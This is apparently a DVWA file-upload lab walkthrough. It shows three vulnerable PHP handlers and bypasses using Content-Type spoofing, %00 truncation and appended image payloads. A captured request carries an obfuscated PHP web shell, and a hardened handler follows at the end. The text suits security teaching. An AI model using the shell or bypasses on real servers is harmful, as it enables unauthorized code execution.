Low
```php
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} successfully uploaded!</pre>";
    }
}

?>
```
There is no restriction on the file type at all: a PHP file can be uploaded directly and is then reachable at http://localhost/hackable/uploads/XX.php.
Medium
```php
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} successfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
```
This level restricts the upload by the type the client reports ($_FILES['uploaded']['type'], i.e. the Content-Type of the form part) and by size.
Method 1: use Burp Suite for %00 truncation. Name the file "1.php .jpg" (note the space in the middle), then in Burp's Intercept change the space byte to 00.
Method 2: upload the file 2.php directly and intercept the request. The captured request looks like this:

```http
POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549

-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream

<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['loveautumn']);
?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------143381619322555--
```

Changing the Content-Type of the file part (application/octet-stream above) to image/jpeg is enough to pass the check, because the server only compares that client-supplied header.
High

```php
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1 );
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} successfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
```
The High level checks both the file extension and the image header strictly, so the file header has to be spoofed. Note also how the extension is taken: for a file name such as 1.php.png, strrpos returns the position of the last '.', which is 5, and substr takes everything from position 6, so the extension checked is png and the file is accepted and stored as a PNG.
First open a normal image file in Notepad, append a PHP one-liner after the image data, and save. This spoofs the file-type detection.
Finally, the extension check has to be bypassed. Rename the file to 1.php.png, upload it, and intercept with Burp Suite. Modifying
Content-Disposition: form-data; name="uploaded"; filename="1.php.png"
to
Content-Disposition: form-data; name="uploaded"; filename="1.php\x00.php.png"
only produces a file named x00.php.png (this is the method mentioned in an article on a PHP arbitrary file upload vulnerability). Space truncation does not work either. I currently do not know the final answer; perhaps the uploaded JPG containing PHP code can be combined with a file inclusion vulnerability to finish the job? This remains an open question.
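For contrast with the three DVWA handlers above, here is a hardened version written for this walkthrough (it is added example code, not DVWA's own source). It never trusts the client's Content-Type or file name, and it re-encodes the image so code appended after the image data is dropped; the storage directory $uploadDir and the GD/fileinfo extensions are assumptions.

```php
<?php
// Added example (not DVWA code): a hardened replacement for the upload handler.
// It closes the gaps exercised at all three levels above: the client-supplied
// Content-Type and file name are never trusted, and the image is re-encoded so
// that bytes appended after the image data (the header-spoofing trick) do not
// survive into the stored file. Assumed: $uploadDir is outside the web root or
// has script execution disabled; the GD and fileinfo extensions are loaded.
function handle_image_upload(array $file, string $uploadDir, int $maxBytes = 100000): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('No valid upload');
    }
    if ($file['size'] > $maxBytes) {
        throw new RuntimeException('File too large');
    }
    // Determine the type from the bytes on disk, not from $_FILES['uploaded']['type'],
    // which is whatever the client put in the Content-Type of the form part.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('Only JPEG or PNG images are accepted');
    }
    // getimagesize() passes an image with PHP code appended; decoding and
    // re-encoding writes pixel data only, so the appended payload is dropped.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('Not a decodable image');
    }
    // Server-generated name: 1.php.png, %00 and double-extension tricks in the
    // client's file name never reach the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    $ok = ($mime === 'image/png') ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('Could not store image');
    }
    return $name;
}

if (isset($_POST['Upload']) && isset($_FILES['uploaded'])) {
    try {
        // Hypothetical storage directory; adjust to the deployment.
        $stored = handle_image_upload($_FILES['uploaded'], __DIR__ . '/../private_uploads');
        echo '<pre>' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8') . ' uploaded.</pre>';
    } catch (RuntimeException $e) {
        echo '<pre>Your image was not uploaded. ' . htmlspecialchars($e->getMessage()) . '</pre>';
    }
}
```

The handler alone does not make the uploads directory safe: the stored files should be served from a location where the web server will not execute scripts (for Apache with mod_php, `php_flag engine off` in that directory), or through a script that streams them with a fixed image Content-Type.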